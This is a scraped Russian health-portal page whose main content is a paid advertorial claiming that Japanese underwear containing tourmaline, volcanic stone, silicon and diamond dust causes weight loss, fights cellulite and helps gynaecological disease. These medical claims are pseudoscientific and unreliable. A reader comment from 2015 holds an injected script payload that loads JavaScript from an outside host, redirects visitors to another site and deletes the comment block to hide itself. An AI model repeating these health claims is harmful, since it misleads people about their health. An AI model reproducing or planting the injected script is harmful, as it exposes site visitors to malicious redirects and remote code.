Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Белье с минералами поможе...  >>  Белье с минералами поможет сбросить вес
 
Обратная связь
 

Белье с минералами поможет сбросить вес

Размер шрифта
30 мая 2011 00:00
  • google_analytics: false
  • Нравится

В организме взрослого человека примерно 3,5 кг минеральных веществ. Как и витамины, многие из них необходимы для жизнедеятельности. Зная о важности минералов, японские ученые научились использовать их в белье для похудения.

Вес поможет сбросить белье с минералами

Александр Тушкин / «Здоровье-инфо»

Народы всего мира издавна используют минералы для лечения различных болезней. Скандинавия знаменита своими минеральными водами. На Ближнем Востоке – целая лечебница под открытым небом, Мертвое море. Прибалтика знаменита янтарной терапией. А вот японцы решили пойти своим путем: они выпустили целый ряд продуктов, в производстве которых используются различные минералы: пищевые добавки, косметика и даже нижнее белье с драгоценными камнями!

Японским ученым за идеями далеко ходить не надо: ведь именно на Востоке родилось учение об активных точках на теле человека. Аппликации из камней на ткани стимулируют определенные участки тела. А шорты с минералами оказывают массажный эффект на область ягодиц. В итоге кровь циркулирует быстрее, обмен веществ также ускоряется, и вес снижается не по дням, а по часам.

В отличие от аналогов, белье с минералами лишено многих недостатков:

  • Хорошо пропускает воздух
  • Не накапливает неприятные запахи
  • Можно носить ежедневно
  • Долго служит
  • Лечебно-профилактический эффект оказывается за счет действия минералов, а не стягивания жировых тканей

Какие минералы и металлы помогают нам похудеть?

Что положительного в отрицательных ионах?
В городском воздухе нарушен естественный баланс положительных ионов (катионов) и отрицательных (анионов), так как пыль притягивает их и нейтрализует. Измерения показывают, что в мегаполисах всего 50-200 анионов на 1 см³, что в 3 раза ниже нормы, необходимой для нормального самочувствия (СанПиН от 2003 года рекомендует 600 на см³). Из-за этого у человека ухудшается самочувствие: нарушается дыхание, наваливаются усталость и головная боль.
Соединяясь с молекулами кислорода, отрицательные ионы превращаются в аэроанионы. Воздух приобретает свежесть, которую можно ощутить в лесу или после дождя. Тело человека восстанавливает электрический баланс. Улучшается состав крови, ускоряется метаболизм, активизируется гормональная система. Также отрицательные ионы способны связывать молекулы летучих ароматных веществ, другими словами, устраняют неприятный запах.

1. Турмалин. Синтезирует отрицательные ионы и инфракрасное излучение. Название этой группе сходных по составу и структуре драгоценных камней дали жители Шри-Ланки. В переводе слово «турмалин» означает «камень, притягивающий пепел». Еще сингальцы заметили необычное свойство самоцвета: при нагревании, трении и давлении кристалл сильно электризовался. Этот эффект впоследствии был назван пьезоэлектрическим. Сегодня его активно применяют в промышленности, например, при производстве пьезовых зажигалок для плит. Под действием механических напряжений один конец кристалла заряжается положительно, другой – отрицательно, что дает возможность применять турмалин для синтеза отрицательных ионов в медицинских приборах.

Турмалин состоит из нескольких десятков элементов, сочетание которых порождает ток силой 0,06 мА, который совпадает с электричеством в теле здорового человека. Это единственный минерал на земле с такими свойствами. Прикосновение частиц турмалина с кожей инициирует процесс ее обновления.

Турмалин способен накапливать тепловую энергию, а потом отдавать ее в виде инфракрасного излучения. Турмалин испускает длинные инфракрасные волны, которые представляют собой пучок возбужденных атомов. Инфракрасные лучи повышают местный кровоток, усиливают обмен веществ и расширяют кровеносные сосуды.

Другими словами, турмалин – драгоценный камень с лечебными свойствами. Он активизирует работу тканей тела на разных уровнях и заставляет их функционировать быстрее. Кроме того, турмалин угнетает патогенную микрофлору и уничтожает запахи, что очень важно при носке трусиков с минералами. Такое белье отлично подойдет женщинам, страдающим гинекологическими заболеваниями.

Вес поможет сбросить белье с минералами

2. Вулканический камень. Уничтожает целлюлит за счет согревания. Эта порода образуется в результате излияния магмы из жерла вулкана. Лава застывает и превращается в вулканические камни. Отличительной особенностью таких камней является их теплоемкость. Они способны на долгое время запасать тепло, а потом отдавать его хозяину. Ткань с вшитыми вулканическими камнями оказывает бережное термическое воздействие, прогревая внутренние органы. Это способствует быстрому выводу лишней жидкости, что помогает в борьбе с целлюлитом. В таком белье для похудения вы точно не вспотеете, так как ткань с минералами отлично пропускает воздух из-за особого кроя.

3. Силиций. Улучшает состояние кожи. Другие названия этого самого распространенного минерала на земле – силикон, или кремний. Силиций отвечает за биосинтез кератина, коллагена, соединительной и хрящевой ткани. Его нехватка в организме напрямую сказывается на молодости кожи, эластичности волос. Поэтому белье с содержанием кремния помогает бороться с кожными болезнями и целлюлитом.

4. Бриллиантовая пыль. Массажирует. Бриллиантовая пыль получается в результате огранки алмаза – самого твердого в мире минералов. Эта драгоценная пудра входит в состав эксклюзивной продукции – женских трусиков. Пыль из самоцветов массажирует активные точки в районе «галифе», стимулируя отвод жидкости из этих проблемных зон. Алмаз нормализует работу органов малого таза и оказывает эффективное противовоспалительное действие. Вы только представьте, насколько дороги ваши ягодицы, раз рядом с ними даже алмазы превращаются в пыль.

Сколько минералов содержится в белье? Количество кристаллов измеряется гомеопатическими дозами. Меньше всего минералов в трусиках – примерно 2 г, больше всего в лосинах – 20 г. Почему так мало? Японцы доказали, что наилучший медицинский эффект достигается, если структура кристалла нарушена, и он равномерно распылен по ткани. Поэтому белье с минералами обладает высокими потребительскими качествами: ничего не будет чесаться, и вы не будете потеть. Благодаря минералам, это белье будет носиться очень долго: топик с минералами может выдержать до 1200 стирок, и он прослужит вам целых пять лет!

Белье с минералами станет отличным дополнением к вашему здоровому рациону питания и физическим тренировкам. Например, топ с рукавами позволит уменьшить объем талии на 6 см. При этом белье отлично выглядит и его можно носить каждый день под одеждой благодаря бесшовной кройке. Все товары производятся в Японии, что гарантирует высокую профилактическую эффективность.

На правах рекламы

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как уменьшить жир на лице?   Кровавая диета   Даю установку на похудение   Массаж для похудения  
28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых 15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз!
 
15 февраля 2012Похудение может быть заразным 05 октября 2011Зеленый чай поможет похудеть
 

Слайдшоу

1
12 популярных мифов о здоровом питании
От этой еды будет понос!
Как справиться с обжорством?

Тесты

1
Жиры, которые мы едим
Знаете ли вы, как работает ваш желудок?
Есть ли у вас избыточный вес?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.